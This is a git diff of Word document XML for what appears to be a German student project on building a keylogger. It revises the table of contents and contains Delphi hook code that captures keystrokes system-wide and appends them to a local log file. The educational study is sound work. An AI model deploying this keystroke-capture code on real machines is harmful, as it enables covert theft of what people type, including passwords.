           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>        VK_DELETE: buf := 'Delete';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_TAB: buf := 'Tab';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_RETURN: buf := 'Enter';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_SHIFT: buf := 'Shift';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_CAPITAL: buf := 'CapsLock';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_ESCAPE: buf := 'Esc';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_SPACE: buf := 'Space';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        // etc. keys you're interested in</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      else</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        buf := AChar[0];</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      end;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      LogText := LogText + buf;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      // open the log file</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      FileName := 'c:\log.txt'; // your log filename here</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      AssignFile(FF, FileName);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      if FileExists(FileName) then Append(FF)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      else Rewrite(FF);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      // write to the log</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      WriteLn(FF, LogText);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      // close the log file</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      CloseFile(FF);</w:t>
+        <w:br/>
+        <w:t>    // set the hook</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    TheHookHandle := SetWindowsHookEx(WH_GETMESSAGE, @TheHookProc, hInstance, 0);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>procedure StopTheHook; stdcall;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  if (TheHookHandle &lt;&gt; 0) then begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    // Remove our hook and clear our hook handle</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    if (UnhookWindowsHookEx(TheHookHandle) &lt;&gt; FALSE) then begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      TheHookHandle := 0;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -887,6 +1057,12 @@
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
         <w:t>  end;</w:t>
       </w:r>
       <w:r>
@@ -894,27 +1070,6 @@
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:br/>
-        <w:t>  {Call the next hook in the hook chain}</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>  if (Code &lt; 0) then</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>    result := CallNextHookEx(TheHookHandle, Code, wParam, lParam);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
         <w:t>end;</w:t>
       </w:r>
       <w:r>
@@ -928,142 +1083,6 @@
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:br/>
-        <w:t>procedure StartTheHook; stdcall;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>begin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>  if (TheHookHandle = 0) then begin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>    // set the hook</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>    TheHookHandle := SetWindowsHookEx(WH_GETMESSAGE, @TheHookProc, hInstance, 0);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>  end;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>end;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>procedure StopTheHook; stdcall;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>begin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>  if (TheHookHandle &lt;&gt; 0) then begin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>    // Remove our hook and clear our hook handle</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>    if (UnhookWindowsHookEx(TheHookHandle) &lt;&gt; FALSE) then begin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      TheHookHandle := 0;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>    end;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>  end;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>end;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
         <w:t>exports</w:t>
       </w:r>
       <w:r>
@@ -1071,12 +1090,6 @@
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>  StartTheHook,</w:t>
       </w:r>
       <w:r>

--- a/Konzept.docx
+++ b/Konzept.docx
@@ -5,34 +5,22 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Titel"/>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t>Infoprojekt  - Key Logger</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="berschrift1"/>
         <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
+          <w:sz w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="40"/>
         </w:rPr>
         <w:t>Inhaltsverzeichnis</w:t>
       </w:r>
@@ -45,14 +33,22 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-        <w:t>Einleitung</w:t>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>Einlei</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>tung</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -63,12 +59,12 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
         </w:rPr>
         <w:t>Motivation</w:t>
       </w:r>
@@ -81,12 +77,12 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
         </w:rPr>
         <w:t>Ziel</w:t>
       </w:r>
@@ -99,14 +95,40 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-        <w:t>Vorgehensweise</w:t>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Allgemein </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>Keylogger</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>Software</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -117,12 +139,12 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
         </w:rPr>
         <w:t>Delphi</w:t>
       </w:r>
@@ -135,15 +157,17 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
         </w:rPr>
         <w:t>Git</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -153,14 +177,32 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-        <w:t>Der Keylogger</w:t>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>Hilfsmittel</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>Programmtechnische Umsetzung</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -171,14 +213,14 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-        <w:t>Verschidene States</w:t>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>Realisierung</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -189,12 +231,12 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
         </w:rPr>
         <w:t>Log</w:t>
       </w:r>
@@ -207,14 +249,50 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
         </w:rPr>
         <w:t>Erklärung anhand Code</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>Leistungsfähigkeit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Einschränkungen </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -225,6 +303,87 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>Reflexion</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>Anhang</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>Code</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>Tagesjournal</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift1"/>
+        <w:rPr>
           <w:lang w:val="sq-AL"/>
         </w:rPr>
       </w:pPr>
@@ -232,46 +391,7 @@
         <w:rPr>
           <w:lang w:val="sq-AL"/>
         </w:rPr>
-        <w:t>Reflexion</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="berschrift1"/>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="berschrift1"/>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="berschrift1"/>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="berschrift1"/>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL"/>
-        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Hook example to reverse engineer </w:t>
       </w:r>
     </w:p>
@@ -563,12 +683,396 @@
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:br/>
+        <w:t>begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  result := 0;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">  if (Code = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>HC_ACTION</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>) then begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    if (tagMSG(Ptr(lParam)^).Message = WM_KEYUP) or (tagMSG(Ptr(lParam)^).Message = WM_KEYDOWN) then begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>// pointer?</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // record UP/DOWN state</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      if (tagMSG(Ptr(lParam)^).Message = WM_KEYUP) then LogText := 'KEYUP   '</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      else LogText := 'KEYDOWN ';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // translate the key to ASCII</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      GetKeyboardState(KeyState);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>VirtualKey := tagMSG(Ptr(lParam)^).WParam;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      ScanCode := HIBYTE(LOWORD(tagMSG(Ptr(lParam)^).lParam));</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // exceptions</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      case VirtualKey of</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_BACK: buf := 'Backspace';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
